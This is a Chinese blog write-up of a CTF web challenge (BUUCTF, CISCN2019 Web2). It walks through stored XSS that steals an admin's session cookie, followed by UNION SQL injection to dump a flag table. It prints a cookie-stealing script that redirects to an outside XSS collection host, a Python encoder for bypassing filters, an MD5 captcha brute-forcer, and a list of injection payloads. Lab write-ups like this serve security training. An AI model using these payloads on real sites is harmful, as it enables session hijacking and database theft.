BUUCTF:[CISCN2019 华东北赛区]Web2
标签: BUUCTF:[CISCN2019 华东北赛区]Web2 HarmonyOS博客 51CTO博客
2023-06-19 18:24:24 182浏览
经测试发现存在以下页面:
index.php
admin.php
login.php
register.php
post.php
commitbug.php
about.php![BUUCTF:[CISCN2019 华东北赛区]Web2_html](https://s2.51cto.com/images/blog/202306/19154819_64900843c6f0e27781.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
admin.php没有权限登录,联系下文估计是要得到admin的session登录
![BUUCTF:[CISCN2019 华东北赛区]Web2_html_02](https://s2.51cto.com/images/blog/202306/19154819_64900843dec7c67752.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
投稿存在XSS,但是存在一些过滤,使用Markup 转码,然后eval执行JS代码,并且需要一个window.location.href来自动触发刷新颜面
使用题目提供的站内XSS平台
![BUUCTF:[CISCN2019 华东北赛区]Web2_ci_03](https://s2.51cto.com/images/blog/202306/19154820_649008440429b70082.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
添加windows.location.href,并删去if判断那一段
(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();然后利用脚本,进行编码绕过,并且执行
xss='''(function(){window.location.href='http://xss.buuoj.cn/index.php?do=api&id=arHAGx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();'''
output = ""
for c in xss:
output += "&#" + str(ord(c))
print("<svg><script>eval("" + output + "")</script>")![BUUCTF:[CISCN2019 华东北赛区]Web2_php_04](https://s2.51cto.com/images/blog/202306/19154820_649008441c2dc72343.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
然后把这些payload插入投稿
文章地址:http://24175362-da9c-4f99-bb8d-110e10bfb9bf.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html
![BUUCTF:[CISCN2019 华东北赛区]Web2_ci_05](https://s2.51cto.com/images/blog/202306/19154820_6490084436f0328431.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
在反馈页面反馈,刚刚发布的那篇文章,是的管理员去查看带有XSS的文章
MD5验证码脚本:
import hashlib
def func(md5_val):
for x in range(999999, 100000000):
md5_value=hashlib.md5(str(x)).hexdigest()
if md5_value[:6]==md5_val:
return str(x)
if __name__ == '__main__':
print func('b76301')![BUUCTF:[CISCN2019 华东北赛区]Web2_ci_06](https://s2.51cto.com/images/blog/202306/19154820_64900844561dc19001.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
这里注意文章地址在反馈的时候要改成
http://web.node3.buuoj.cn/post/1b34bb5a26804f2410d6746d2129bb7b.html
![BUUCTF:[CISCN2019 华东北赛区]Web2_html_07](https://s2.51cto.com/images/blog/202306/19154820_649008446f56c26126.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[CISCN2019 华东北赛区]Web2_php_08](https://s2.51cto.com/images/blog/202306/19154820_6490084488cee48309.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
XSS平台接收到一个来自内网访问的请求,这就是管理元的访问,使用这个PHPSESSION登录admin.php
![BUUCTF:[CISCN2019 华东北赛区]Web2_php_09](https://s2.51cto.com/images/blog/202306/19154820_64900844a24be56581.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
登陆成功,经过测试发现是个很简单的联合查询注入,一系列注入payload如下:
-2 union select 1,2,3#
-2 union select 1,database(),user()#
-2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ciscn'#
-2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flag'#
-2 union select 1,2,group_concat(flagg) from ciscn.flag#![BUUCTF:[CISCN2019 华东北赛区]Web2_php_10](https://s2.51cto.com/images/blog/202306/19154820_64900844cd7e016466.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
好博客就要一起分享哦!分享海报
此处可发布评论
评论(0)展开评论
展开评论
您可能感兴趣的博客
